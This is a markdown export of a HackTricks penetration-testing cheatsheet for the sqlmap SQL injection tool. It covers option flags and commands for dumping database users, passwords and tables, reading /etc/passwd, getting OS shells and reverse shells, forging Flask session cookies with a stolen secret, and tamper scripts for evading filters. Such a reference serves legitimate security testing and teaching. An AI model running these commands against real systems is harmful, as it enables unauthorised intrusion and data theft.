overview.md (15136B)
1 --- 2 title: "SQLMap - Cheatsheet" 3 section: "Web Pentesting" 4 sectionSlug: "pentesting-web" 5 sourcePath: "src/pentesting-web/sql-injection/sqlmap/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/sql-injection/sqlmap/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # SQLMap - Cheatsheet 14 15 This cheatsheet is the extended sqlmap option reference. For a shorter task-oriented starting point, see the [compact SQLMap guide](/hacktricks/pentesting-web/sql-injection/sqlmap). 16 17 ## Basic arguments for SQLmap 18 19 ### Generic 20 21 ```bash 22 -u "<URL>" 23 -p "<PARAM TO TEST>" 24 --user-agent=SQLMAP 25 --random-agent 26 --threads=10 27 --risk=3 #MAX 28 --level=5 #MAX 29 --dbms="<KNOWN DB TECH>" 30 --os="<OS>" 31 --technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ") 32 --batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers 33 --auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI) 34 --auth-cred="<AUTH>" #HTTP authentication credentials (name:password) 35 --proxy=http://127.0.0.1:8080 36 --union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char 37 ``` 38 39 ### Technique flags (`--technique`) 40 41 The `--technique` option lets you restrict or reorder the SQL injection techniques sqlmap will test. 42 Each letter corresponds to a different class of payloads: 43 44 | Letter | Technique | Description | 45 | ------ | --------- | ----------- | 46 | B | Boolean-based blind | Uses true/false conditions in the page response to infer results | 47 | E | Error-based | Leverages verbose DBMS error messages to extract data | 48 | U | UNION query | Injects `UNION SELECT` statements to fetch data via the same channel | 49 | S | Stacked queries | Appends extra statements separated by a SQL delimiter (`;`) | 50 | T | Time-based blind | Relies on `SLEEP/WAITFOR` delays to detect injectable conditions | 51 | Q | Inline / out-of-band | Utilises functions such as `LOAD_FILE()` or DNS exfiltration to extract data | 52 53 The default order that sqlmap will follow is `BEUSTQ` (all techniques). 54 You can change both the order and the subset. For instance, the following command will **only** attempt UNION query and Time-based blind techniques, trying UNION first:<sup>[[1]](#references)</sup> 55 56 ```bash 57 sqlmap -u "http://target.tld/page.php?id=1" --technique="UT" --batch 58 ``` 59 60 ### Retrieve Information 61 62 #### Internal 63 64 ```bash 65 --current-user #Get current user 66 --is-dba #Check if current user is Admin 67 --hostname #Get hostname 68 --users #Get usernames od DB 69 --passwords #Get passwords of users in DB 70 --privileges #Get privileges 71 ``` 72 73 #### DB data 74 75 ```bash 76 --all # Enumerate all available information 77 --dump # Dump rows from selected DBMS tables 78 --dbs # Enumerate database names 79 --tables # Enumerate tables in -D <DB NAME> 80 --columns # Enumerate columns in -D <DB NAME> -T <TABLE NAME> 81 -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> # Dump one selected column 82 ``` 83 84 Using [SQLMapping](https://taurusomar.github.io/sqlmapping/) it is a practical tool that generates commands and provides a complete overview, both basic and advanced, for SQLMap. It includes ToolTips that explain each aspect of the tool, detailing every option so that you can improve and understand how to use it efficiently and effectively 85 86 ## Injection place 87 88 ### From Burp/ZAP capture 89 90 Capture the request and create a req.txt file 91 92 ```bash 93 sqlmap -r req.txt --current-user 94 ``` 95 96 ### GET Request Injection 97 98 ```bash 99 sqlmap -u "http://example.com/?id=1" -p id 100 sqlmap -u "http://example.com/?id=*" -p id 101 ``` 102 103 ### POST Request Injection 104 105 ```bash 106 sqlmap -u "http://example.com" --data "username=*&password=*" 107 ``` 108 109 ### Injections in Headers and other HTTP Methods 110 111 ```bash 112 #Inside cookie 113 sqlmap -u "http://example.com" --cookie "mycookies=*" 114 115 #Inside some header 116 sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*" 117 sqlmap -u "http://example.com" --headers="referer:*" 118 119 #PUT Method 120 sqlmap --method=PUT -u "http://example.com" --headers="referer:*" 121 122 #The injection is located at the '*' 123 ``` 124 125 ### Indicate string when injection is successful 126 127 ```bash 128 --string="string_showed_when_TRUE" 129 ``` 130 131 ### Add detection technique 132 133 If you found a SQLi but sqlmap didn't detect it, you can force the detection technique with args like `--prefix` or `--suffix`, or if more complex, adding it to the paylaods used by sqlmap in `/usr/share/sqlmap/data/xml/payloads/time_blind.xml` for example for time blind based. 134 135 136 ### Eval 137 138 **Sqlmap** allows the use of `-e` or `--eval` to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the **flask cookie session** **is signed by flask with the known secret before sending it**: 139 140 ```bash 141 sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump 142 ``` 143 144 ### Shell 145 146 ```bash 147 #Exec command 148 python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami 149 150 #Simple Shell 151 python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell 152 153 #Dropping a reverse-shell / meterpreter 154 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn 155 ``` 156 157 ### Read File 158 159 ```bash 160 --file-read=/etc/passwd 161 ``` 162 163 ### Crawl a website with SQLmap and auto-exploit 164 165 ```bash 166 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 167 168 --batch = answer prompts with sqlmap's defaults 169 --crawl = recursively follow links to the requested depth 170 --forms = parse forms and test their input fields 171 ``` 172 173 ### Second Order Injection 174 175 ```bash 176 # Revisit a separate endpoint after storing the first-order payload 177 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 178 # Joomla administration example 179 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs 180 ``` 181 182 [**Read this post** ](/hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap)**about how to perform simple and complex second order injections with sqlmap.** 183 184 ## Customizing Injection 185 186 ### Set a suffix 187 188 ```bash 189 python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " 190 ``` 191 192 ### Prefix 193 194 ```bash 195 python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') " 196 ``` 197 198 ### Help finding boolean injection 199 200 ```bash 201 # Mark a string that is absent from true responses to calibrate boolean-blind detection 202 sqlmap -r r.txt -p id --not-string ridiculous --batch 203 ``` 204 205 ### Tamper 206 207 Remember that **you can create your own tamper in python** and it's very simple. You can find a tamper example in the [Second Order Injection page here](/hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap). 208 209 ```bash 210 --tamper=name_of_the_tamper 211 #In kali you can see all the tampers in /usr/share/sqlmap/tamper 212 ``` 213 214 | Tamper | Description | 215 | ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | 216 | apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | 217 | apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | 218 | appendnullbyte.py | Appends encoded NULL byte character at the end of payload | 219 | base64encode.py | Base64 all characters in a given payload | 220 | between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | 221 | bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | 222 | chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | 223 | commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | 224 | commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | 225 | concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' | 226 | charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | 227 | charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022" | 228 | charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022" | 229 | equaltolike.py | Replaces all occurrences of the equality operator ('=') with `LIKE` | 230 | escapequotes.py | Slash escape quotes (' and ") | 231 | greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | 232 | halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | 233 | ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | 234 | modsecurityversioned.py | Embraces complete query with versioned comment | 235 | modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | 236 | multiplespaces.py | Adds multiple spaces around SQL keywords | 237 | nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | 238 | percentage.py | Adds a percentage sign ('%') in front of each character | 239 | overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | 240 | randomcase.py | Replaces each keyword character with random case value | 241 | randomcomments.py | Add random comments to SQL keywords | 242 | securesphere.py | Appends special crafted string | 243 | sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | 244 | space2comment.py | Replaces space character (' ') with comments | 245 | space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | 246 | space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | 247 | space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | 248 | space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 249 | space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | 250 | space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 251 | space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | 252 | space2plus.py | Replaces space character (' ') with plus ('+') | 253 | space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 254 | symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and | 255 | unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | 256 | unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | 257 | uppercase.py | Replaces each keyword character with upper case value 'INSERT' | 258 | varnish.py | Append a HTTP header 'X-originating-IP' | 259 | versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | 260 | versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | 261 | xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | 262 263 264 ## References 265 266 - [1] [SQLMap: Testing SQL Database Vulnerabilities](https://blog.bughunt.com.br/sqlmap-vulnerabilidades-banco-de-dados/)